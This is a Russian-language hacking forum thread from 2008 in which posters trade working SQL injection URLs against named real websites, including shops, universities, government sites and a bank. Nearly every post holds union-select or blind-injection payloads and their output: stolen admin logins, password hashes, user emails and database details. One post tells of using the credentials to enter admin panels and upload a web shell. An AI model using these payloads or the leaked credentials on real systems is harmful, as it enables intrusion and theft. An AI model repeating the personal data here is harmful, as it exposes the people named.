логин,пасс:
re310t4554rtr54try41h1g892g2h65j:57re7palm1513g4hg
-------------------------------
http://www.berceaumagique.com/cat.php?id=-6+union+select+1,2,3,concat_ws(0x3a,login,0x3a,pas s,0x3a,mail),5,6,7,8,9+from+admin+where+id=1--
логин,пасс:
charlotte:407686174a65f5219d4b2132df7d29fa
--------------------------------
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword,0x3a,user_email),6,7+from+phpbb_users+limi t+1,1/*
логин/пасс:
admin:81407d59d0a24fc624b87f54c23b74b5

spherics

12.11.2008, 01:45

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,version(),3/*

version 5.0.37-community-log
user globalwater@ww1.4what.net
database globalwaterfoundation_org_-_1

spherics

12.11.2008, 03:25

Магазин Исполнителя Гитариста Продюссера
Tim Scott

http://www.timscott.co.uk/store/product_detail.php?id=3+union+select+1,2,3,version (),5,user(),database(),8 ,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24--

version 4.1.22-standard
user timscottDBM@server213-171-219-1.livedns.org.uk
database timscott

spherics

12.11.2008, 04:40

Магазин каких-то безделушек -)

http://www.forgetyourself.com/product.php?id=-4/**/union/**/select/**/1,database(),3,4,user(),6, 7,8,9 ,10,11,12,13,14,version(),16,17,18--

version 5.0.51a-community
database indig_fys
user indig_fys@localhost

sabe

12.11.2008, 06:06

FNS, cremator (c)

ламал недавно) можно достать модераторов.. и вешать активные хсс.. дальше не смотрел..

truelamer

12.11.2008, 22:55

http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,version(),5,6,7--

5 ветка

http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(table_name,char(58),ta ble_schema),5,6,7+from+INFORMATION_SCHEMA.tables--

joomla)

jos_users:hatkz_autosapa - видим что таблица пользователей находится в бд hatkz_autosapa

и поэтому:

http://www.hat.kz/?order=3&category=-1+union+select+1,2,3,concat(username,char(58),pass word,char(58),email),5,6,7+from+hatkz_autosapa.jos _users--

admin:0cc399da4fb1e5952f2b30c0bd84d6ad:1vt3X6E9loX O5f9W:auto@sapa.kz

-m0rgan-

13.11.2008, 01:03

Зона gov:
http://www.lvif.gov.lv/?object_id=1344+union+select+1,name,3+from+VF_admi ns--
http://www.lvif.gov.lv/?object_id=1344+union+select+1,password,3+from+VF_ admins--
логин/пасс:
videsinvfonds:f7S2ApsSKXbP
Fonds:tests
----------------------------------------
http://www.mete.gov.al/rub.php?idr=121+and+1=2+union+select+1,2,3,4,5,6,c oncat(username,char(58),password),8,9,10,11,12+fro m+editor--
логин/пасс:
admin:da6908b78bbf1e1541001e8e3dbf2467
----------------------------------------
http://www.ert.gov.al/ert_alb/cal_det.html?Id=23+and+1=2+union+all+select+1,conc at(userid,char(58),password),3,null,null,null,null ,null+from+users/*
логин/пасс:
altink:altinx
-----------------------------------------
Покаместь все....

FNS

13.11.2008, 03:15

http://urshop.tv/product-view.html?p=-98+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+users--
http://urshop.tv/admin/

truelamer

13.11.2008, 11:58

4 ветка, читалка файлов не работает, доступа к mysql.users нет.

http://www.pluralism.org/news/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42+/*

vladim1

13.11.2008, 13:27

http://www.revolution.com.mk/info.php?productID=1301+UNION+SELECT+1,2,CONCAT(us er(),0x2D,version(),0x2D,database()),4,5,6,7,8,9,1 0,11,12,13,14,15--

HARDWARE SHOP

-m0rgan-

13.11.2008, 17:55

http://www.robappelhof.com/view.php?sub=yes&id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9+from+users/*
логин/пасс:
sdf:asdf
--------------------------------------------
http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
логин/пасс:
montego1234:cf160b832b994d0ca868dc74ef856880
----------------------------------------
http://www.fqs-al.org/index.php?faqe=list&kid=-9999+union+all+select+1,concat_ws(char(58),user,pa ssword),3,4,5+from+mysql.user--
логин/пасс:
yroot:129861984de011d2
fqsweb:51dbed7249c11393
fqs:34a07b654db61525
yscr_a8fGf:261cc0e75ff78611
--------------------------------------------
http://www.co-plan.org/egug/rub.php?idr=7+and+1=2+union+all+select+1,2,3,conca t(username,char(58),password),5,6,7,8,9+from+edito r--&l=a
логин/пасс:
admin:fe01ce2a7fbac8fafaed7c982a04e229
-------------------------------------------------
http://comenri.com/index.php?option=com_simpleshop&task=browse&Itemid=30&catid=-1+UNION+SELECT+user(),concat(username,0x3a,passwor d),user(),user(),user(),user(),user(),user()+FROM+ jos_users--
логин/пасс:
admin:acedc1e07c3ea3d226615527a4983e37:WQkaXp1lblt QZCmR
------------------------------------------------
http://www.yappika.or.id/index.php?option=com_beamospetition&pet=-5%20UNION%20SELECT%20user(),user(),user(),user(),u ser(),user(),user(),concat(username,0x3a,password) ,user(),user(),user(),user(),user(),user(),user()% 20FROM%20jos_users--&lang=id
логин/пасс:
admin:c3839ac39113c5a82ca8547820819dbc:g454EJEzLbY jADq5
fahrul:eea3b7ed87cdf07e7bbc4d577ccb6b5d:dixDCoe9ns ft5h11
Myleea:0f7b2d7ed181fd33cddc1ba9d79869d7:XpcWyKrnQg JuUXwU
Ira_Nezabudka:fd8ccc478642302747a2c4dc335a343a:PJk HhgwsMsFbSBnC
Rini:5b68afeea28450750bc4e055c109d752:NbEsp3lBDRnQ hxJO
sawsarpaltela:54708a96d0ae079776ecefc35151d783:QHd pwJ6XhdsqRERs
wergiewom:06ecaade2a8f9d3ebf49a44ce7bb96d6:4OtKGLP rFWsx1C85
Meloomime:d56dfae4bfbf100ed8b564587b3d672c:NFvCoL8 vqnhbnQeP
Kibeirreste:9ae987505c6b005935c50074ea356193:mPrgl d5lDjYniO6n
teja:3a39d97d4bd94cefacc88db044dc3c0e:D5vPL3RHV8qJ K9je
Bambang:8bad21a0c5711f985d4a2a7d80d26f73:VXxkMgQnu 1jS8WIF
shewiya:553761834941e5a605c80fd204a03786:CPk64H3Md 7HYO323
abu_rayyan:dc4678a51b68b10d2516c24e8fa6037e:MpRjGY y7zeTjBtMA
margarittaes:9346bb6ebd998c9b40a4b1dc716c238f:pR3G HfgyZutYRLe4
sennioritta:2ef9195156e87d73787c7c1310a6bafc:aPKIa UJY6U02YEdz
Lilis:b6694dc2469ab892ab1593440aa0bfc8:uabh5vGv4tW SPkGH
oppownmix:878a75e5bf8a8c4d919da7ad46273d3e:VEJrYYn SXMUMH71f
------------------------------------------------
http://www.heibai.net/article/forum_zoom.php?forumid=15)+and+1=2+union+select+1, concat(username,0x3a,password),3+from+user+where+u serid=1/*
логин/пасс:
starkun:f0295802427cb4e72233d6d2b97e62e1
-------------------------------------
http://www.chemistry.montana.edu/news.php?id=4990+union+select+1,2,concat_ws(0x3a,u ser,password),4,5,6,7+from+mysql.user/*
root:05980b2317eaa529
----------------------------------------------
The End!

groupby

13.11.2008, 19:48

http://www.music.md/studio.php?stdid=-1%20union%20select%201,2,3,4,5%20from%20tbuser/*

Не могу найти ни одной колонки из этой таблицы гребаной. В общем дружно ломаем :)

foopi

13.11.2008, 21:06

http://www.music.md/studio.php?stdid=-1+union+select+1,2,concat_ws(0x3a,usrLogin,usrPass wd),4,5+from+tbuser+limit+0,1/*

пароли подходят к форуму

Fugitif

13.11.2008, 23:50

http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat(name,char(58),password ),2,3,4,5,6,7,8,9,10%20FROM%20user%20LIMIT%201,1/*
http://cartoons.sev.com.au/index.php?catid=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),data base(),user()),2,3,4,5,6,7,8,9,10/*

http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),da tabase(),user()),3/*
4.1.22-standard:pajura_phpb1:pajura_galeria@localhost
http://www.pajuraturda.org/album.php?catid=-1%20UNION%20SELECT%201,concat(user_password,char(5 8),username),3%20FROM%20phpbb_users%20LIMIT%201,1/*
68b6dbf8be7603ea668ae8da6ea3a199:avaka

DREASTY

13.11.2008, 23:56

http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать

pento

14.11.2008, 00:23

http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать
google://information_schema
И вперед...

FNS

14.11.2008, 01:04

http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3a,password) +from+users--
http://www.ultraproducts.com/admin/

-m0rgan-

14.11.2008, 01:52

http://www.tid.odessa.ua/news/?newsid=-1 UNION SELECT 1,2,3,4,5

немогу дальше подобрать
http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information _schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут (http://forum.antichat.ru/thread43966.html)

beerhack

14.11.2008, 02:53

PR5
http://www.uwsn.org/sup.php?id=-99999+union+select+1,2,3,4,unhex(hex(version())),6/*

version:4.1.13-standard-log

DREASTY

14.11.2008, 04:56

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+table_name,2,3,4,5+from+information _schema.tables+limit+1,1--
И перебирай таблицы,пока не найдеш нужную тебе колонку....когда найдеш почитай тут (http://forum.antichat.ru/thread43966.html)

Спасибо m0rgan !!

newtid@localhost
5.0.32-Debian_7etch8-log

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--

admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214

админку так и не нашел!

procedure

14.11.2008, 16:57

Акционерный коммерческий банк «Интеграл» (сокращенно АКБ «Интеграл-банк») – это универсальное банковское учреждение, предоставляющее полный комплекс услуг на внутреннем и внешнем финансовых рынках.
url: http://fxintegral.com/
target: http://fxintegral.com/beginer/ справа email подписка RSS
using: в имени вводим -999999' email: любой
Description: 4 поля. Вывод не приходит на email. Запрос -999' не обрабатывается, при нажатии отправить выводит SQL Syntax и.т.д. Запрос union+select+user(),user(),user(),user()/* проходит успешно. Вывод запроса опять же не приходит на email. Не показывается на странице.На сайте доступны различные банковские операции.

dArKkNiGHt

15.11.2008, 01:15

Спасибо m0rgan !!

newtid@localhost
5.0.32-Debian_7etch8-log

http://www.tid.odessa.ua/news/?newsid=-1+UNION+SELECT+login,password,3,4,5+from+managers+ limit+1,1%20--

admin:shokhov
price:123456
isisis:123456
vale:valevale
irina:123
towka:123456
boris:123
margarita:123456
kuzoff:54214

админку так и не нашел!
а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят :(

jjokker

15.11.2008, 08:56

а толку то? совсем ничего не даёт, ну узнал пользователей, пароли, а применить некуда.
всю базу можно раскрутить а сделать ничего более.
file_priv закрыт, ни шэлл, ни другие пакости не проходят :(

Эээ... Уважаемый , а что вы вообще хотите ??? Как то давно я поднимал тему на irc по поводу целесообразности и вообще надобности взломов ;)
Мало кто мог адекватно ответить для чего он ломает тот или иной ресурс. Сегодня за ночь пересмотрел почти всю эту ветку и тут помоему просто все учатся.
Человеку показали как сделать определенное движение) Он его сделал и сказал спасибо! Я считаю это резальт который нужен.

Спустя 20 мин)

Уважаемый, Хакер это не тот человек который знает скул и как ее крутит, хакер этот тот кто думает головой. Перед тем как или во время поиска скули надо обращать внимание на все... надо собирать информацию об атакуемом сервере и понимать в конечном итоге что тебе надо от него , если только БД , то наш уважаемый -DREASTY- , толко что показал что данные очень элементарно экспортируются из БД администратора в наш Notepad++ ;) это уже в своем роде пакость (а для кого то возможно и деньги), так что на ваш вопрос по поводу того "а толку то?" лично я ответил.
Идем далее, с чего вы делаете такие поспешные выводы относителньо того что дальше ничего не сделать? Подколоть старательного ученика в том что он плохо научился пользоваться MySQL 5.+? Или это просто ваши выводы из ходя из того что Вы ничего не смогли сделать???
Итак(после быстрого моего анализа):
_http://www.tid.odessa.ua/phpinfo.php
_http://www.tid.odessa.ua/adserv/www/admin/
(пароль и логин подходят)
это чисто управление пользователями,кликами,бан нерами,БД,ПО,обновлением ддвига... после 10 минутнорго мучения заливки шелла через баннер shell.php.gif при том что там менял настройки хранения банера не в БД и не стороннем сервере а именно в каталоге сайта ... прав на исполнение все равно не было... поэтому шелл как был залит так и удален. ;) болше ничего пробовать не сстал, поскольку понимал что где должно быть управление контентом сайта...
Так оно и есть _http://www.tid.odessa.ua/siteadmin/
(логин пароль опять же подходят)
там сразу есть заливка файлов ;) прям первая первая страничка ... тыдынс _http://www.tid.odessa.ua/files/achat.php , поскольку не люблю функционал этого шелла сразу через еще и другой шелл. Более того права на сервере не велики , но на чтение практически все. более того можем вылезти из корней директории выше на другие сайты ... 2ip показал что их 3 , но в реале их там больше!

Вывод: Уважаемый не делайте поспешных выводов!!!

Прошу простить Администрацию и Модератора за типа оффтоп... ну просто правда выбесил пассажир =((

jjokker

15.11.2008, 13:48

']пр 8 тиц 700
http://www.kcl.ac.uk/news/events_details.php?year=2008&event_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40--
не чего не выводит, но есть другая
http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23,24,25--&year=2008
к сожелению мало чем помогло)

еду пр 5
http://www.mfhs.edu/news/news_display.asp?artID=-1+or+1=@@version--

_http://www.kcl.ac.uk/news/news_details.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,email ,15,16,17,18,19,20,21,22,23,24,25+from+users--&year=2008

4.1.22-standard-log::webteam_newsdev::newsdev@localhost

Next:
waqar.alam@kcl.ac.uk
christopher.saward@kcl.ac.uk
julie.munk@kcl.ac.uk
susan.farrell@kcl.ac.uk
peter.graham@kcl.ac.uk
alex.bevis@kcl.ac.uk
kate.moore@kcl.ac.uk
kate.saunders@kcl.ac.uk
liz.newell@kcl.ac.uk
melanie.gardner@kcl.ac.uk
webnews@kcl.ac.uk
kate.thomas@kcl.ac.uk

префиксов нет ни перед таблицами ни в колонках.

поэтому твоя фраза "к сожелению мало чем помогло)", черезчур поспешна ... кто ищет тот всегда найдет ...

jjokker

15.11.2008, 14:22

UP !!!
Я вручную сбрутил спустя за 5 минут после публикации твоего поста ;)))

jjokker

15.11.2008, 16:22

_http://www.aussiepcshop.com/product_info.php/cPath/44/products_id/161'
_http://woohoo.aussiepcshop.com/phpmyadmin/
_http://payments.aussiepcshop.com/phpmyadmin/index.php
-----------------------------
_http://www.airsideshop.com/product.php?id=316%20order%20by%204+--+
-----------------------------
_http://www.tannenbaumholidayshop.com/store.cfm?SearchType=Cat&Searchterm=11'
-----------------------------
_http://www.knifeshop.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1&kat_aktiv=357&Ziel_ID=4310'&javascript_enabled=true&PEPPERSESS=65df5b010c16ad29aef8f3519684b2f5&w=1366&h=716#Ziel4310
-----------------------------
_http://www.worstpreviews.com/review.php?id=67'
-----------------------------

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,h ost),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ mysql.user+limit+6,1/*

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,USER (),VERSION(),DATABASE()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*

web@localhost :: 4.0.15-log :: century

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,p assword),8,9,10,11,12,13,14,15,16,17,18,19,20,21+f rom+mysql.user+limit+0,1/*

root::2e4fe35a29f3f92f::herbert
rick::5c96ea97620d605c::
mdcback::43334d0c52429114::backup
florian::2941613d4db7badf::
testuser::7dcda0d57290b453::testpass
florian2::2941613d4db7badf::
flowb::43b140e955182c71::
david::

_http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,user ,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+fro m+mysql.user+limit+0,1/*

florian::%
florian2::%
sethh::%
testuser::%
tony::%
flowb::207.22.66.13
replicant::207.22.66.178
david::207.22.66.230
mediatwo::207.22.66.27
mediatwo::207.22.66.71
web::69.7.74.77
david::ats
david::localhost
mdc_sync::localhost
-------------------------------
_http://www.trikeshop.com/shop_details.php?id=270+order+by+10/*
_http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,concat_ws(0x3a3a,VERSION( ),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/*
4.1.20-log :: 334558_trikeshop@172.16.10.133 :: 334558_trikeshop
_http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,load_file(0x2f6574632f706 173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+news/*
-------------------------------
_http://www.krsaddleshop.com/jump.jsp?itemType=CATEGORY&itemID=21'&path=1
-------------------------------
_http://www.wowshop.com.ua/index.php?productID=640'
-------------------------------
_http://www.broderbund.com/jump.jsp?itemID=1670'&mainPID=1670&itemType=PRODUCT&path=1%2C2%2C6%2C413&iProductID=1670
-------------------------------
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=89+order+by+100/*
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17/*
_http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,username,passwor d,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),U SER()),16,17+from+user+limit+0,1/*

tomsalinsky:0b37d5345cdb88b60219337856bc0256::slit hy
deborah, 2fe7cec3131fa9662906ecfb2eac8a49::moose
4.1.20::the-spontaneity-shop_com::tom@localhost
--------------------------------
_http://www.dutchtradeshop.com/store/itemDetail.php?itemID=10023'
--------------------------------
_http://www.lobbsfarmshop.com/ShowDetails.asp?id=1794'
--------------------------------
_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--#p
_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+fro m+information_schema.columns--#p

_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+table_name+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+table_name+NOT+IN+('ProductTbl ~bak',%20'CategoryTbl','CategoryTbltest','Category TypeTbl','CategoryTypeTbltest','emailTBL','emailTb ltest','Order_Details','Order_Detailstest','OrderT bl','OrderTbltest','PricingTbl','PricingTbl~bak',' PricingTblA','PricingTbltest','ProductTbl','Produc tTblA','ProductTbltest','TestTBL','TrayPricingTbl' ,'TreeList_Tmp','sysconstraints','syssegments'))--
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+column_name+FROM+INFORMATION _SCHEMA.COLUMNS+WHERE+table_name='OrderTbl'+AND+co lumn_name+NOT+IN+('orderID',%20'Name','Address1',' Address2','City','State','Zip','Country','Phone',' Mobile','Email'))--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
----------------------------------
_http://www.waltsbikeshop.com/outdoors/products/12/1081%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,VER SION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28/*/

4.1.20::waltben4_walt@localhost::waltben4_publicWe b
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20f rom%20users/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20f rom%20news/*/
_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,use r_login,user_password),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28%20from%20use rs%20limit%200,1/*/

concat_ws(0x3a3a,user_id,user_login,user_password)

2::mdbendel::jgarcia <------ administrator
31::bikeguybob::kyle
44::lindsay::june078
9::dave::dave
10::sarah::lea
14::zach::shannon
16::cortez::cortez
29::shannoncanfield::bikes
30::jds::suckme
31::bikeguybob::kyle
33::mountainbkr14::viper
35::kdp::123
43::jdames::itsugar1
41::rex::theodore
42::cirvin::chrisbirvin
45::david::djszp5
46::mgwvd3::garth131
37::quickfeet18::dave11
40::will.verbarg::02291984

_http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,use r_id,user_login,user_password),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20fr om%20users%20where%20user_id=2/*/
_http://www.waltsbikeshop.com/admin/index.php
---------------------------------
_http://www.graysflowershop.com/view-category.asp?cid=4'
---------------------------------
_http://www.oldsweetshop.com/products.asp?CatID=127'&p=0
---------------------------------
_http://www.bagshop.com/store/cart_pages/gift_certficates.php?ID=4468'
---------------------------------
_http://www.fentonartglass.com/shop/item.asp?item=DS197KI'%20OR%201=@@version--
---------------------------------
_http://www.1stopmarineshop.com/product_info.php?cPath=1607958'&products_id=20794484
---------------------------------
_http://www.dropshop.com/db/npwd_db_detail.php3?id_producto=51797'
---------------------------------
_http://www.goldenmagnolia.com/deutsch/go.php?kategorieID=130'&no=1
---------------------------------

xibox

15.11.2008, 22:45

jjokker спасибо -)

Ponchik

16.11.2008, 03:20

tm.die-webber.com
http://tm.die-webber.com/tools/?login=narks1%22+UNION+SELECT+1,2,column_name,4,5, 6,7,8,9+FROM+information_schema.columns+LIMIT+0,1/*
таблы и пару ячеек
compteur_visite (compteur,date,time,duree,ip)
tmu_banlist
tmu_boosters
tmu_boostersUpdate
tmu_challengers
tmu_challenges
tmu_players (login,nickname,path,team1,team2,team3,team4,team, update)
tmu_servers
tmu_teams
tmu_tracks
tmu_votes

Ламоза

16.11.2008, 03:22

http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*
PR8 Тиц 650
Все таблицы просмотрел, ничего полезного не нашёл. Может у вас получится.

truelamer

16.11.2008, 07:52

http://at.kz/?p=-1+union+select+1,2,version()/*

5.0.18-log

http://at.kz/?p=-1+union+select+1,2,table_name+from+INFORMATION_SCH EMA.TABLES+limit+16,1/*

есть таблица контент
content

И ВСЕ )))

bons

16.11.2008, 13:21

www.computerworld.com.ua
тИЦ = 130; PR = 5

http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(version(),char(0x3 A),database(),char(0x3A),user()),7,8,9,10,11,12,13 ,14,15/*

version() - 4.1.22-log
database() - comizdat3
user() - comizdat@hosting02.iptelecom.net.ua

http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(login,char(0x3A),p assword),7,8,9,10,11,12,13,14,15+from+admin+limit+ 0,1/*

admin:sdbgsbglodstre

-----------------------------------------------------

www.russian.kiev.ua
тИЦ = 230; PR = 4

http://www.russian.kiev.ua/book.php?id=-1+union+select+version(),2,3,user(),5,6,database() ,8,9,10,11--

version() - 5.0.67-log
user() - russian@hosting.colocall.net
database() - russian

есть таблица с паролями:

http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),login,cha r(0x3A),passwd),2,3,4,5,6,7,8,9,10,11+from+tbl_use rs+limit+0,1--

17:root:root

форум phpbb, но он не работает

http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),username, char(0x3A),user_password),2,3,4,5,6,7,8,9,10,11+fr om+phpbb_users+where+user_level=1+limit+0,1--

2:admin_admin:0192023a7bbd73250516f069df18b500

-----------------------------------------------------

www.videotor.com
тИЦ = 30; PR = 1

http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(version(),char(0x3A),d atabase(),char(0x3A),user())/*

version() - 5.0.45
database() - videotor_blog
user() - videotor@localhost

http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(login,char(0x3A),passw ord)+from+users+limit+0,1/*

Bot:ghbpthdfnbd
Slayer:COUNTer
oleg:ghbpthdfnbd
sergey:kiskis

ThreeD

16.11.2008, 19:29

Шопчег. Дисками торгует.

http://www.dirtcheapcds.com.au/viewContent.php?id=-31+union+select+1,2,concat_ws(0x3A3a,version(),dat abase()),4,5/*

4.0.24_Debian-10ubuntu2-log::dirtcheap_db

MolotSNK

16.11.2008, 22:07

_http://www.info77.org/index.php?catid=-1%20union%20select%20group_concat(version()),22222 2--

MolotSNK

16.11.2008, 22:33

http://www.spomir.ru/rass/spo_out&action=view_archive&id=-1%20union%20select%201,version(),3,4,5,6,7

Смотрим в хедер)

plutus

17.11.2008, 03:49

http://www.youplusw ephotography.com/blog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password,re g_date,last_date,sess),3+from+user s+limit+1,1--

http://tripleco rd.com/news/index.php?link=73&cat=-2+union+select+1,concat_ws(0x3a,login,password),3+ from+users+limit+1,1--

http://www.kevin swan.com/slog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password),3+ from+users--

http://www.shar alana.com/blog/index.php?link=20&cat=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users--

http://www.beb bblog.com/index.php?category=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users/*

-m0rgan-

17.11.2008, 04:07

http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(5 8),username,password)+using+utf8),4,null,6,null,8, 9+from+login--
логин/пасс:
admin:mbreti
-------------------------------------------
http://www.gazeta-standard.com/tekst.php?idt=6342+and+1=2+union+all+select+1,conc at(username,char(58),password),3,4,5,6,7,8,9,10,11 ,12,13,14,15+from+editor--
логин/пасс:
admin:62a90ccff3fd73694bf6281bb234b09a
-------------------------------------------
http://www.gazetaetiranes.com.al/print.php?lajmID=922'+union+select+1,2,concat(user name,char(58),password),4,5,6,7,8,9,10,11,12,13,14 +from+user/*
логин/пасс:
admin-gt:2fa4b2f3e0acb4e59e02d060db05da74
----------------------------------------------
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58), name,pass),6,7,8,9+from+users+limit+1,1/*
логин/пасс:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec
--------------------------------------------
http://www.ktpae.gr/declaration_more.php?decl_id=-172+union+select+1,concat_ws(char(58),user,passwor d),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+mysq l.user/*
логин/пасс:
root:*3225EBFDCE9E60181BB8157769BC1EF316DC15D0
---------------------------------------------
The End!

Calcutta

17.11.2008, 06:14

http://shop.health-beauty.ca/content.php?TextID=1+and+substring(version(),1,1)= 4

version()=4

truelamer

17.11.2008, 06:31

http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr(ver sion(),1,1)))=53--%20

5 ветка

http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr((se lect+table_name+from+INFORMATION_SCHEMA.TABLES+lim it+16,1),1,1)))=118--%20

т.е имя 16 таблицы начинается с буквы 'v', view)))

ну и так далее? как говориться курочка по зернышку....)

pingvincible

17.11.2008, 09:17

http://www.comingsoon.net/films.php?id=11750+and+ascii(lower(substring(user( ),1,1)))<=100+#+

user: comingso_nextra
database: comingso_nextra
version: 4

не дает юзать union select.

DimOnOID

17.11.2008, 10:22

http://deti.mail.ru/nyanya?type=2+and+substring(version(),1,1)=4
version(): 4.0 ;)
http://deti.mail.ru/lineyki?edit=[id вашей созданной линейки]+and+substring(version(),1,1)=4 ;)

Sindicat

17.11.2008, 17:05

Удалите сообщение не туда написал

DezMond™

17.11.2008, 17:53

http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,TABLE_NAME),4,5+from+informat ion_schema.tables+l imit+25,2/*
---------------------------------
table:
usuario
votos_final
voto
video
ultimasvisitas
postcomentario
post
perfil
foto
CHARACTER_SETS
experiencia
ed_languages
ed_countries_text
comentario
VIEWS
USER_PRIVILEGES
TRIGGERS
TABLE_PRIVILEGES
TABLE_CONSTRAINTS
TABLES
STATISTICS
SCHEMA_PRIVILEGES
SCHEMATA
ROUTINES
KEY_COLUMN_USAGE
COLUMN_PRIVILEGES
COLUMNS
